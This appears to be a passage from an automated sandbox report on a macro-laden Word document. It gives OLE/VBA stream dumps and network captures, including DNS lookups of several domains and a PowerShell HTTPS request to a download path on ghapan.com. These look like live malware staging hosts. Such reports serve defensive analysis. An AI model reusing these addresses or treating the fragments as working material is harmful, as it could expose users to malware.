                                                                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                                                              Data Raw:cc 61 af 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 09 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1295
                                                                                              General
                                                                                              Stream Path:Macros/VBA/dir
                                                                                              File Type:data
                                                                                              Stream Size:1295
                                                                                              Entropy:6.66258059973
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . 6 c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . e ( c .
                                                                                              Data Raw:01 0b b5 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 f8 ad 36 63 03 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                              Stream Path: Macros/deutsche/\x1CompObj, File Type: data, Stream Size: 97
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:97
                                                                                              Entropy:3.61064918306
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: Macros/deutsche/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 293
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/\x3VBFrame
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:293
                                                                                              Entropy:4.6019336942
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } d e u t s c h e . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 9 5 1 0 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 1 7 6 4 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 64 65 75 74 73 63 68 65 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20
                                                                                              Stream Path: Macros/deutsche/f, File Type: data, Stream Size: 25453
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/f
                                                                                              File Type:data
                                                                                              Stream Size:25453
                                                                                              Entropy:7.53927539842
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . ( . H . . . . . . . @ . . . . . . . . . . . } . . . y . . . A . . . . . . . . . . . R . . . . . . . . . . . K . Q l t . . # a . . . . . . . . J F I F . . . . . ` . ` . . . . . F E x i f . . M M . * . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 04 28 00 48 0c 20 0c 0f 00 00 00 04 40 00 00 ff ff 00 00 10 00 00 00 00 7d 00 00 8b 79 00 00 87 41 00 00 00 00 00 00 00 00 00 00 04 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 6c 74 00 00 23 61 00 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 46 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 04 01 12 00 03 00 00 00 01 00 01 00 00 51 10 00 01 00 00 00 01
                                                                                              Stream Path: Macros/deutsche/i08/\x1CompObj, File Type: data, Stream Size: 115
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:115
                                                                                              Entropy:4.80096587863
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: Macros/deutsche/i08/f, File Type: data, Stream Size: 176
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/f
                                                                                              File Type:data
                                                                                              Stream Size:176
                                                                                              Entropy:2.97906999268
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . $ . H . . . . . . . . . . . . . . . . } . . g . . . ; . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 a b 4 5 . . . , . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . , . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 04 24 00 48 0c 00 0c 0b 00 00 00 04 c0 00 00 04 00 00 00 00 7d 00 00 67 0c 00 00 3b 0d 00 00 00 00 00 00 00 00 00 00 03 00 00 00 70 00 00 00 00 83 01 00 00 00 18 00 e4 01 00 00 09 00 00 00 94 00 00 00 02 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 0a 00 00 00 23 00 04 00 00 00 07 00 50 61 67 65 31 61 62 34 35 00 00 00 2c 02 00 00 00 00 24 00 d5 01 00 00
                                                                                              Stream Path: Macros/deutsche/i08/i10/\x1CompObj, File Type: data, Stream Size: 110
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i10/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:110
                                                                                              Entropy:4.63372611993
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: Macros/deutsche/i08/i10/f, File Type: data, Stream Size: 56
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i10/f
                                                                                              File Type:data
                                                                                              Stream Size:56
                                                                                              Entropy:2.34097456399
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 04 1c 00 40 0c 00 08 04 c0 00 00 00 7d 00 00 fd 0b 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 0c 00 19 00 00 00 f3 ff 01 00 ff 01 00 00
                                                                                              Stream Path: Macros/deutsche/i08/i10/o, File Type: empty, Stream Size: 0
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i10/o
                                                                                              File Type:empty
                                                                                              Stream Size:0
                                                                                              Entropy:0.0
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:
                                                                                              Data Raw:
                                                                                              Stream Path: Macros/deutsche/i08/i11/\x1CompObj, File Type: data, Stream Size: 110
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i11/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:110
                                                                                              Entropy:4.63372611993
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: Macros/deutsche/i08/i11/f, File Type: data, Stream Size: 40
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i11/f
                                                                                              File Type:data
                                                                                              Stream Size:40
                                                                                              Entropy:1.85677964945
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 81 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: Macros/deutsche/i08/i11/o, File Type: empty, Stream Size: 0
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/i11/o
                                                                                              File Type:empty
                                                                                              Stream Size:0
                                                                                              Entropy:0.0
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:
                                                                                              Data Raw:
                                                                                              Stream Path: Macros/deutsche/i08/o, File Type: data, Stream Size: 148
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/o
                                                                                              File Type:data
                                                                                              Stream Size:148
                                                                                              Entropy:2.94288068709
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . l . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . . ; . . . . . . . P a g e 1 . i . . . . . P a g e 2 . i . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a b 4 . . . . . . . .
                                                                                              Data Raw:00 02 6c 00 31 80 fa 00 00 00 00 00 18 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 67 0c 00 00 3b 0d 00 00 05 00 00 80 50 61 67 65 31 00 69 00 05 00 00 80 50 61 67 65 32 00 69 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00
                                                                                              Stream Path: Macros/deutsche/i08/x, File Type: data, Stream Size: 48
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/i08/x
                                                                                              File Type:data
                                                                                              Stream Size:48
                                                                                              Entropy:1.50393263469
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 09 00 00 00 0a 00 00 00 0b 00 00 00
                                                                                              Stream Path: Macros/deutsche/o, File Type: data, Stream Size: 27655
                                                                                              General
                                                                                              Stream Path:Macros/deutsche/o
                                                                                              File Type:data
                                                                                              Stream Size:27655
                                                                                              Entropy:7.58599422597
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . H . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . A . . . . . . . . H . , . . . . & . . . ] . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . . . . . . . . . . . . . g . . . . R . . . . . . . . . . . K . Q l t . . # a . . . . . . . . J F I F . . . . . ` . ` . . . . . F E x i f . . M M . * . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . C . . . . . . . .
                                                                                              Data Raw:00 02 14 00 01 01 00 80 00 00 00 00 1b 48 80 ac a2 19 00 00 93 0b 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 41 01 05 80 00 00 00 00 1b 48 80 2c 03 01 02 00 26 17 00 00 5d 11 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 10 00 00 06 00 00 ff ff 00 00 7f 15 00 00 67 0c 00 00
                                                                                              Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                              General
                                                                                              Stream Path:WordDocument
                                                                                              File Type:data
                                                                                              Stream Size:4096
                                                                                              Entropy:1.19381836644
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . n . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:ec a5 c1 00 55 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 03 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 25, 2021 18:39:44.046063900 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.046123028 CET44349167136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.046291113 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.059439898 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.059489965 CET44349167136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.118246078 CET44349167136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.118439913 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.138794899 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.138830900 CET44349167136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.139239073 CET44349167136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.343780994 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.418467999 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.442889929 CET44349167136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.442960024 CET44349167136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.443089962 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.447130919 CET49167443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.447877884 CET49168443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.447926044 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.448096991 CET49168443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.448513985 CET49168443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.448532104 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.499346018 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.515625000 CET49168443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.515671015 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.638647079 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.639447927 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.639611006 CET49168443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.639637947 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.641002893 CET44349168136.243.74.161192.168.2.22
                                                                                              Nov 25, 2021 18:39:44.641192913 CET49168443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:44.641544104 CET49168443192.168.2.22136.243.74.161
                                                                                              Nov 25, 2021 18:39:46.163261890 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:46.163297892 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.166827917 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:46.167211056 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:46.167224884 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.463530064 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.463730097 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:46.478859901 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:46.478908062 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.479207039 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.482583046 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:46.524867058 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.747865915 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.747927904 CET44349169192.185.17.114192.168.2.22
                                                                                              Nov 25, 2021 18:39:46.748894930 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:46.753209114 CET49169443192.168.2.22192.185.17.114
                                                                                              Nov 25, 2021 18:39:48.328252077 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:48.328291893 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:48.328366041 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:48.328720093 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:48.328733921 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:48.886857986 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:48.887017965 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:48.899224043 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:48.899245024 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:48.899910927 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:48.902821064 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:48.944870949 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:49.502192974 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:49.502355099 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:49.502417088 CET44349170210.211.111.87192.168.2.22
                                                                                              Nov 25, 2021 18:39:49.502485991 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:49.503237963 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:49.503262997 CET49170443192.168.2.22210.211.111.87
                                                                                              Nov 25, 2021 18:39:51.143524885 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.143573046 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.143637896 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.143887043 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.143908024 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.455617905 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.455741882 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.463444948 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.463466883 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.463781118 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.466507912 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.508893967 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.750993967 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.751152039 CET44349171143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.751306057 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.751650095 CET49171443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.752234936 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.752269030 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.752330065 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.752552032 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:51.752564907 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.050285101 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.052012920 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:52.052037954 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.353887081 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.356327057 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.356519938 CET44349172143.95.80.83192.168.2.22
                                                                                              Nov 25, 2021 18:39:52.356550932 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:52.356913090 CET49172443192.168.2.22143.95.80.83
                                                                                              Nov 25, 2021 18:39:52.357350111 CET49172443192.168.2.22143.95.80.83

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 25, 2021 18:39:43.991426945 CET5216753192.168.2.228.8.8.8
                                                                                              Nov 25, 2021 18:39:44.028645992 CET53521678.8.8.8192.168.2.22
                                                                                              Nov 25, 2021 18:39:45.994435072 CET5059153192.168.2.228.8.8.8
                                                                                              Nov 25, 2021 18:39:46.162559986 CET53505918.8.8.8192.168.2.22
                                                                                              Nov 25, 2021 18:39:47.986946106 CET5780553192.168.2.228.8.8.8
                                                                                              Nov 25, 2021 18:39:48.327522039 CET53578058.8.8.8192.168.2.22
                                                                                              Nov 25, 2021 18:39:51.105479002 CET5903053192.168.2.228.8.8.8
                                                                                              Nov 25, 2021 18:39:51.143021107 CET53590308.8.8.8192.168.2.22
                                                                                              Nov 25, 2021 18:39:53.603638887 CET5918553192.168.2.228.8.8.8
                                                                                              Nov 25, 2021 18:39:53.641560078 CET53591858.8.8.8192.168.2.22

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Nov 25, 2021 18:39:43.991426945 CET192.168.2.228.8.8.80x7aeeStandard query (0)ghapan.comA (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:45.994435072 CET192.168.2.228.8.8.80xeebStandard query (0)gruasingenieria.peA (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:47.986946106 CET192.168.2.228.8.8.80xfab2Standard query (0)yoowi.netA (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:51.105479002 CET192.168.2.228.8.8.80x9a82Standard query (0)chaturanga.groopy.comA (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:53.603638887 CET192.168.2.228.8.8.80xc2b7Standard query (0)lotolands.comA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Nov 25, 2021 18:39:44.028645992 CET8.8.8.8192.168.2.220x7aeeNo error (0)ghapan.com136.243.74.161A (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:46.162559986 CET8.8.8.8192.168.2.220xeebNo error (0)gruasingenieria.pe192.185.17.114A (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:48.327522039 CET8.8.8.8192.168.2.220xfab2No error (0)yoowi.net210.211.111.87A (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:51.143021107 CET8.8.8.8192.168.2.220x9a82No error (0)chaturanga.groopy.com143.95.80.83A (IP address)IN (0x0001)
                                                                                              Nov 25, 2021 18:39:53.641560078 CET8.8.8.8192.168.2.220xc2b7Name error (3)lotolands.comnonenoneA (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • ghapan.com
                                                                                              • gruasingenieria.pe
                                                                                              • yoowi.net
                                                                                              • chaturanga.groopy.com

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.2249167136.243.74.161443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-11-25 17:39:44 UTC0OUTGET /Kdg73onC3oQ/090921.html HTTP/1.1
                                                                                              Host: ghapan.com
                                                                                              Connection: Keep-Alive
                                                                                              2021-11-25 17:39:44 UTC0INHTTP/1.1 302 Found
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 683
